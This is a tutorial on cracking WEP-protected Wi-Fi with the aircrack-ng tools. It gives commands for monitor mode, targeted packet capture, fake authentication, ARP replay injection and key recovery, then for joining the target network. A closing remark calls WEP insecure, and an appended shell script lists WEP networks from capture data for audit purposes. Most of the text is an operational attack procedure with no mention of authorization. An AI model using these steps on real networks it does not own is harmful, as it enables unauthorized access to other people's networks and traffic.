WEP Networks

Cracking WEP Keys Using a Fake Authentication and Traffic Generation

In this tutorial, we'll demonstrate how to crack WEP keys by injecting fake authentication requests and generating traffic to collect enough IVs (Initialization Vectors) for cracking the WEP key.

Prerequisites

Ensure you have the following:

  • A wireless card that supports monitor mode.

  • The necessary tools: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

  • A wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by disabling any interfering services, then put your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

2. Scan for Networks

Next, scan for nearby wireless networks to identify the one you want to target:

sudo airodump-ng wlan0mon

This command will show a list of available networks, including their BSSID (MAC address) and channel.

3. Run Airodump on Specific Access Point

Once you've identified the target AP, run airodump-ng on the specific network to capture data:

sudo airodump-ng --bssid <BSSID> -c <Channel> -w <output_file> wlan0mon
  • <BSSID>: The MAC address of the target AP.

  • <Channel>: The channel number on which the AP is operating.

  • <output_file>: The prefix for the capture files (e.g., capture). airodump-ng appends a counter, so the data is written to capture-01.cap, with a matching capture-01.csv listing the networks seen.

4. Create Fake Authentication Requests

In order to associate with the target AP and start generating traffic, use aireplay-ng to send fake authentication requests:

sudo aireplay-ng -1 3600 -q 10 -a <BSSID> wlan0mon
  • -1 3600: Fake authentication, re-sent every 3600 seconds (1 hour) to stay associated.

  • -q 10: Sends a keep-alive packet every 10 seconds so the AP does not drop the association.

  • -a <BSSID>: The BSSID of the target AP.

5. Generate Traffic for IVs

Next, you need to generate traffic to collect enough IVs for cracking the WEP key. This is done by injecting traffic using aireplay-ng:

sudo aireplay-ng -3 -b <BSSID> -h <Client MAC> wlan0mon
  • -3: The ARP request replay attack, which re-injects captured ARP requests so the AP answers with freshly encrypted frames, each carrying a new IV.

  • -b <BSSID>: The BSSID of the target AP.

  • -h <Client MAC>: The MAC address of a client device connected to the AP.

6. Crack the WEP Key

Once you've captured enough IVs, use aircrack-ng to crack the WEP key:

sudo aircrack-ng <output_file>-01.cap

<output_file>-01.cap: The capture file containing the IVs (airodump-ng appends -01 to the name given with -w). If aircrack-ng reports that it has too few IVs, leave step 5 running and try again once airodump-ng shows a higher count in its #Data column.

Connecting to the Wireless Network:

Return the interface to managed mode first (sudo airmon-ng stop wlan0mon), then connect with wpa_supplicant using a configuration file that contains the recovered key:

sudo wpa_supplicant -i wlan0 -c <filename>.conf

Then open another terminal and request an IP address from the DHCP server:

sudo dhclient -v wlan0

7. Conclusion

After following these steps, you should have cracked the WEP key for the target AP. This method works by injecting fake authentication requests, generating traffic to collect IVs, and then using those IVs to break the encryption.

Note: WEP is an outdated and insecure protocol. It is highly recommended to use WPA2 or WPA3 encryption for better security.
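As an added example (not part of the original page): the .csv that airodump-ng writes next to the .cap in step 3 records each AP's Privacy field, so the same capture doubles as an inventory of networks still running WEP that should be migrated to WPA2/WPA3. The script parses a constructed sample in that CSV layout (the BSSIDs and ESSIDs are made up) and prints every WEP network with its channel and IV count.

```shell
#!/bin/sh
# Added example, not from the original page: list networks still using WEP
# from the CSV that airodump-ng -w writes alongside the .cap, so they can be
# found and migrated to WPA2/WPA3.

# Constructed sample in airodump-ng's CSV layout (addresses and names are made up).
SAMPLE_CSV="$(mktemp)"
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP , OPN,  -40,      120,    5310,   0.  0.  0.  0,   8, LegacyAP, 
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK,  -55,       98,       0,   0.  0.  0.  0,   6, Office, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN , ,     ,  -70,       40,       0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  -50,      300, 00:11:22:33:44:55, 
EOF

# Print "BSSID CHANNEL IVS ESSID" for each access point whose Privacy field is WEP.
# The file has two sections; scanning stops at the "Station MAC" header.
wep_networks() {
  awk -F',' '
    /^Station MAC/ { exit }
    $1 ~ /^[0-9A-Fa-f][0-9A-Fa-f]:/ {
      priv = $6; gsub(/^ +| +$/, "", priv)
      if (priv == "WEP") {
        ch = $4; ivs = $11; essid = $14
        gsub(/^ +| +$/, "", ch); gsub(/^ +| +$/, "", ivs); gsub(/^ +| +$/, "", essid)
        print $1, ch, ivs, essid
      }
    }' "$1"
}

# Number of WEP networks in a CSV; a non-zero result fails an audit job.
wep_count() {
  wep_networks "$1" | wc -l | tr -d ' '
}

wep_networks "$SAMPLE_CSV"   # prints: 00:11:22:33:44:55 6 5310 LegacyAP
```

Point wep_networks at the real <output_file>-01.csv from step 3 to audit a live capture instead of the sample.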